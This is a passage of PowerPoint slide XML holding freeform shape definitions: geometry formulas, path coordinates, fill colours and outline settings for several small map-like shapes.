                  <a:gd name="T55" fmla="*/ 0 h 90"/>
                  <a:gd name="T56" fmla="*/ 85 w 126"/>
                  <a:gd name="T57" fmla="*/ 2 h 90"/>
                  <a:gd name="T58" fmla="*/ 91 w 126"/>
                  <a:gd name="T59" fmla="*/ 8 h 90"/>
                  <a:gd name="T60" fmla="*/ 94 w 126"/>
                  <a:gd name="T61" fmla="*/ 18 h 90"/>
                  <a:gd name="T62" fmla="*/ 100 w 126"/>
                  <a:gd name="T63" fmla="*/ 23 h 90"/>
                  <a:gd name="T64" fmla="*/ 105 w 126"/>
                  <a:gd name="T65" fmla="*/ 28 h 90"/>
                  <a:gd name="T66" fmla="*/ 103 w 126"/>
                  <a:gd name="T67" fmla="*/ 33 h 90"/>
                  <a:gd name="T68" fmla="*/ 111 w 126"/>
                  <a:gd name="T69" fmla="*/ 40 h 90"/>
                  <a:gd name="T70" fmla="*/ 117 w 126"/>
                  <a:gd name="T71" fmla="*/ 41 h 90"/>
                  <a:gd name="T72" fmla="*/ 125 w 126"/>
                  <a:gd name="T73" fmla="*/ 48 h 90"/>
                  <a:gd name="T74" fmla="*/ 124 w 126"/>
                  <a:gd name="T75" fmla="*/ 57 h 90"/>
                  <a:gd name="T76" fmla="*/ 119 w 126"/>
                  <a:gd name="T77" fmla="*/ 61 h 90"/>
                  <a:gd name="T78" fmla="*/ 111 w 126"/>
                  <a:gd name="T79" fmla="*/ 61 h 90"/>
                  <a:gd name="T80" fmla="*/ 105 w 126"/>
                  <a:gd name="T81" fmla="*/ 67 h 90"/>
                  <a:gd name="T82" fmla="*/ 103 w 126"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 96 w 126"/>
                  <a:gd name="T85" fmla="*/ 67 h 9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26"/>
                  <a:gd name="T130" fmla="*/ 0 h 90"/>
                  <a:gd name="T131" fmla="*/ 126 w 126"/>
                  <a:gd name="T132" fmla="*/ 90 h 90"/>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26" h="90">
                    <a:moveTo>
                      <a:pt x="89" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="85" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="66"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36469" name="Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2557" y="2809"/>
                <a:ext cx="65" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 65"/>
                  <a:gd name="T1" fmla="*/ 6 h 66"/>
                  <a:gd name="T2" fmla="*/ 19 w 65"/>
                  <a:gd name="T3" fmla="*/ 4 h 66"/>
                  <a:gd name="T4" fmla="*/ 21 w 65"/>
                  <a:gd name="T5" fmla="*/ 2 h 66"/>
                  <a:gd name="T6" fmla="*/ 23 w 65"/>
                  <a:gd name="T7" fmla="*/ 1 h 66"/>
                  <a:gd name="T8" fmla="*/ 27 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 66"/>
                  <a:gd name="T10" fmla="*/ 30 w 65"/>
                  <a:gd name="T11" fmla="*/ 1 h 66"/>
                  <a:gd name="T12" fmla="*/ 31 w 65"/>
                  <a:gd name="T13" fmla="*/ 4 h 66"/>
                  <a:gd name="T14" fmla="*/ 32 w 65"/>
                  <a:gd name="T15" fmla="*/ 10 h 66"/>
                  <a:gd name="T16" fmla="*/ 32 w 65"/>
                  <a:gd name="T17" fmla="*/ 15 h 66"/>
                  <a:gd name="T18" fmla="*/ 32 w 65"/>
                  <a:gd name="T19" fmla="*/ 17 h 66"/>
                  <a:gd name="T20" fmla="*/ 34 w 65"/>
                  <a:gd name="T21" fmla="*/ 19 h 66"/>
                  <a:gd name="T22" fmla="*/ 37 w 65"/>
                  <a:gd name="T23" fmla="*/ 21 h 66"/>
                  <a:gd name="T24" fmla="*/ 39 w 65"/>
                  <a:gd name="T25" fmla="*/ 21 h 66"/>
                  <a:gd name="T26" fmla="*/ 45 w 65"/>
                  <a:gd name="T27" fmla="*/ 15 h 66"/>
                  <a:gd name="T28" fmla="*/ 46 w 65"/>
                  <a:gd name="T29" fmla="*/ 14 h 66"/>
                  <a:gd name="T30" fmla="*/ 48 w 65"/>
                  <a:gd name="T31" fmla="*/ 15 h 66"/>
                  <a:gd name="T32" fmla="*/ 50 w 65"/>
                  <a:gd name="T33" fmla="*/ 16 h 66"/>
                  <a:gd name="T34" fmla="*/ 50 w 65"/>
                  <a:gd name="T35" fmla="*/ 18 h 66"/>
                  <a:gd name="T36" fmla="*/ 51 w 65"/>
                  <a:gd name="T37" fmla="*/ 22 h 66"/>
                  <a:gd name="T38" fmla="*/ 50 w 65"/>
                  <a:gd name="T39" fmla="*/ 25 h 66"/>
                  <a:gd name="T40" fmla="*/ 47 w 65"/>
                  <a:gd name="T41" fmla="*/ 31 h 66"/>
                  <a:gd name="T42" fmla="*/ 47 w 65"/>
                  <a:gd name="T43" fmla="*/ 32 h 66"/>
                  <a:gd name="T44" fmla="*/ 49 w 65"/>
                  <a:gd name="T45" fmla="*/ 34 h 66"/>
                  <a:gd name="T46" fmla="*/ 51 w 65"/>
                  <a:gd name="T47" fmla="*/ 34 h 66"/>
                  <a:gd name="T48" fmla="*/ 55 w 65"/>
                  <a:gd name="T49" fmla="*/ 34 h 66"/>
                  <a:gd name="T50" fmla="*/ 64 w 65"/>
                  <a:gd name="T51" fmla="*/ 44 h 66"/>
                  <a:gd name="T52" fmla="*/ 65 w 65"/>
                  <a:gd name="T53" fmla="*/ 46 h 66"/>
                  <a:gd name="T54" fmla="*/ 65 w 65"/>
                  <a:gd name="T55" fmla="*/ 49 h 66"/>
                  <a:gd name="T56" fmla="*/ 63 w 65"/>
                  <a:gd name="T57" fmla="*/ 55 h 66"/>
                  <a:gd name="T58" fmla="*/ 62 w 65"/>
                  <a:gd name="T59" fmla="*/ 59 h 66"/>
                  <a:gd name="T60" fmla="*/ 62 w 65"/>
                  <a:gd name="T61" fmla="*/ 66 h 66"/>
                  <a:gd name="T62" fmla="*/ 51 w 65"/>
                  <a:gd name="T63" fmla="*/ 61 h 66"/>
                  <a:gd name="T64" fmla="*/ 43 w 65"/>
                  <a:gd name="T65" fmla="*/ 57 h 66"/>
                  <a:gd name="T66" fmla="*/ 35 w 65"/>
                  <a:gd name="T67" fmla="*/ 53 h 66"/>
                  <a:gd name="T68" fmla="*/ 33 w 65"/>
                  <a:gd name="T69" fmla="*/ 50 h 66"/>
                  <a:gd name="T70" fmla="*/ 25 w 65"/>
                  <a:gd name="T71" fmla="*/ 42 h 66"/>
                  <a:gd name="T72" fmla="*/ 16 w 65"/>
                  <a:gd name="T73" fmla="*/ 36 h 66"/>
                  <a:gd name="T74" fmla="*/ 11 w 65"/>
                  <a:gd name="T75" fmla="*/ 34 h 66"/>
                  <a:gd name="T76" fmla="*/ 5 w 65"/>
                  <a:gd name="T77" fmla="*/ 30 h 66"/>
                  <a:gd name="T78" fmla="*/ 0 w 65"/>
                  <a:gd name="T79" fmla="*/ 26 h 66"/>
                  <a:gd name="T80" fmla="*/ 0 w 65"/>
                  <a:gd name="T81" fmla="*/ 25 h 66"/>
                  <a:gd name="T82" fmla="*/ 2 w 65"/>
                  <a:gd name="T83" fmla="*/ 23 h 66"/>
                  <a:gd name="T84" fmla="*/ 7 w 65"/>
                  <a:gd name="T85" fmla="*/ 18 h 66"/>
                  <a:gd name="T86" fmla="*/ 15 w 65"/>
                  <a:gd name="T87" fmla="*/ 10 h 66"/>
                  <a:gd name="T88" fmla="*/ 17 w 65"/>
                  <a:gd name="T89" fmla="*/ 6 h 6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65"/>
                  <a:gd name="T136" fmla="*/ 0 h 66"/>
                  <a:gd name="T137" fmla="*/ 65 w 65"/>
                  <a:gd name="T138" fmla="*/ 66 h 6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65" h="66">
                    <a:moveTo>
                      <a:pt x="17" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36470" name="Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2557" y="2809"/>
                <a:ext cx="65" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 65"/>
                  <a:gd name="T1" fmla="*/ 6 h 66"/>
                  <a:gd name="T2" fmla="*/ 19 w 65"/>
                  <a:gd name="T3" fmla="*/ 4 h 66"/>
                  <a:gd name="T4" fmla="*/ 21 w 65"/>
                  <a:gd name="T5" fmla="*/ 2 h 66"/>
                  <a:gd name="T6" fmla="*/ 23 w 65"/>
                  <a:gd name="T7" fmla="*/ 1 h 66"/>
                  <a:gd name="T8" fmla="*/ 27 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 66"/>
                  <a:gd name="T10" fmla="*/ 30 w 65"/>
                  <a:gd name="T11" fmla="*/ 1 h 66"/>
                  <a:gd name="T12" fmla="*/ 31 w 65"/>
                  <a:gd name="T13" fmla="*/ 4 h 66"/>
                  <a:gd name="T14" fmla="*/ 32 w 65"/>
                  <a:gd name="T15" fmla="*/ 10 h 66"/>
                  <a:gd name="T16" fmla="*/ 32 w 65"/>
                  <a:gd name="T17" fmla="*/ 15 h 66"/>
                  <a:gd name="T18" fmla="*/ 32 w 65"/>
                  <a:gd name="T19" fmla="*/ 17 h 66"/>
                  <a:gd name="T20" fmla="*/ 34 w 65"/>
                  <a:gd name="T21" fmla="*/ 19 h 66"/>
                  <a:gd name="T22" fmla="*/ 37 w 65"/>
                  <a:gd name="T23" fmla="*/ 21 h 66"/>
                  <a:gd name="T24" fmla="*/ 39 w 65"/>
                  <a:gd name="T25" fmla="*/ 21 h 66"/>
                  <a:gd name="T26" fmla="*/ 45 w 65"/>
                  <a:gd name="T27" fmla="*/ 15 h 66"/>
                  <a:gd name="T28" fmla="*/ 46 w 65"/>
                  <a:gd name="T29" fmla="*/ 14 h 66"/>
                  <a:gd name="T30" fmla="*/ 48 w 65"/>
                  <a:gd name="T31" fmla="*/ 15 h 66"/>
                  <a:gd name="T32" fmla="*/ 50 w 65"/>
                  <a:gd name="T33" fmla="*/ 16 h 66"/>
                  <a:gd name="T34" fmla="*/ 50 w 65"/>
                  <a:gd name="T35" fmla="*/ 18 h 66"/>
                  <a:gd name="T36" fmla="*/ 51 w 65"/>
                  <a:gd name="T37" fmla="*/ 22 h 66"/>
                  <a:gd name="T38" fmla="*/ 50 w 65"/>
                  <a:gd name="T39" fmla="*/ 25 h 66"/>
                  <a:gd name="T40" fmla="*/ 47 w 65"/>
                  <a:gd name="T41" fmla="*/ 31 h 66"/>
                  <a:gd name="T42" fmla="*/ 47 w 65"/>
                  <a:gd name="T43" fmla="*/ 32 h 66"/>
                  <a:gd name="T44" fmla="*/ 49 w 65"/>
                  <a:gd name="T45" fmla="*/ 34 h 66"/>
                  <a:gd name="T46" fmla="*/ 51 w 65"/>
                  <a:gd name="T47" fmla="*/ 34 h 66"/>
                  <a:gd name="T48" fmla="*/ 55 w 65"/>
                  <a:gd name="T49" fmla="*/ 34 h 66"/>
                  <a:gd name="T50" fmla="*/ 64 w 65"/>
                  <a:gd name="T51" fmla="*/ 44 h 66"/>
                  <a:gd name="T52" fmla="*/ 65 w 65"/>
                  <a:gd name="T53" fmla="*/ 46 h 66"/>
                  <a:gd name="T54" fmla="*/ 65 w 65"/>
                  <a:gd name="T55" fmla="*/ 49 h 66"/>
                  <a:gd name="T56" fmla="*/ 63 w 65"/>
                  <a:gd name="T57" fmla="*/ 55 h 66"/>
                  <a:gd name="T58" fmla="*/ 62 w 65"/>
                  <a:gd name="T59" fmla="*/ 59 h 66"/>
                  <a:gd name="T60" fmla="*/ 62 w 65"/>
                  <a:gd name="T61" fmla="*/ 66 h 66"/>
                  <a:gd name="T62" fmla="*/ 51 w 65"/>
                  <a:gd name="T63" fmla="*/ 61 h 66"/>
                  <a:gd name="T64" fmla="*/ 43 w 65"/>
                  <a:gd name="T65" fmla="*/ 57 h 66"/>
                  <a:gd name="T66" fmla="*/ 35 w 65"/>
                  <a:gd name="T67" fmla="*/ 53 h 66"/>
                  <a:gd name="T68" fmla="*/ 33 w 65"/>
                  <a:gd name="T69" fmla="*/ 50 h 66"/>
                  <a:gd name="T70" fmla="*/ 25 w 65"/>
                  <a:gd name="T71" fmla="*/ 42 h 66"/>
                  <a:gd name="T72" fmla="*/ 16 w 65"/>
                  <a:gd name="T73" fmla="*/ 36 h 66"/>
                  <a:gd name="T74" fmla="*/ 11 w 65"/>
                  <a:gd name="T75" fmla="*/ 34 h 66"/>
                  <a:gd name="T76" fmla="*/ 5 w 65"/>
                  <a:gd name="T77" fmla="*/ 30 h 66"/>
                  <a:gd name="T78" fmla="*/ 0 w 65"/>
                  <a:gd name="T79" fmla="*/ 26 h 66"/>
                  <a:gd name="T80" fmla="*/ 0 w 65"/>
                  <a:gd name="T81" fmla="*/ 25 h 66"/>
                  <a:gd name="T82" fmla="*/ 2 w 65"/>
                  <a:gd name="T83" fmla="*/ 23 h 66"/>
                  <a:gd name="T84" fmla="*/ 7 w 65"/>
                  <a:gd name="T85" fmla="*/ 18 h 66"/>
                  <a:gd name="T86" fmla="*/ 15 w 65"/>
                  <a:gd name="T87" fmla="*/ 10 h 66"/>
                  <a:gd name="T88" fmla="*/ 17 w 65"/>
                  <a:gd name="T89" fmla="*/ 6 h 6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65"/>
                  <a:gd name="T136" fmla="*/ 0 h 66"/>
                  <a:gd name="T137" fmla="*/ 65 w 65"/>
                  <a:gd name="T138" fmla="*/ 66 h 6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65" h="66">
                    <a:moveTo>
                      <a:pt x="17" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36471" name="Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3090" y="1966"/>
                <a:ext cx="286" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 286"/>
                  <a:gd name="T1" fmla="*/ 17 h 189"/>
                  <a:gd name="T2" fmla="*/ 54 w 286"/>
                  <a:gd name="T3" fmla="*/ 12 h 189"/>
                  <a:gd name="T4" fmla="*/ 77 w 286"/>
                  <a:gd name="T5" fmla="*/ 17 h 189"/>
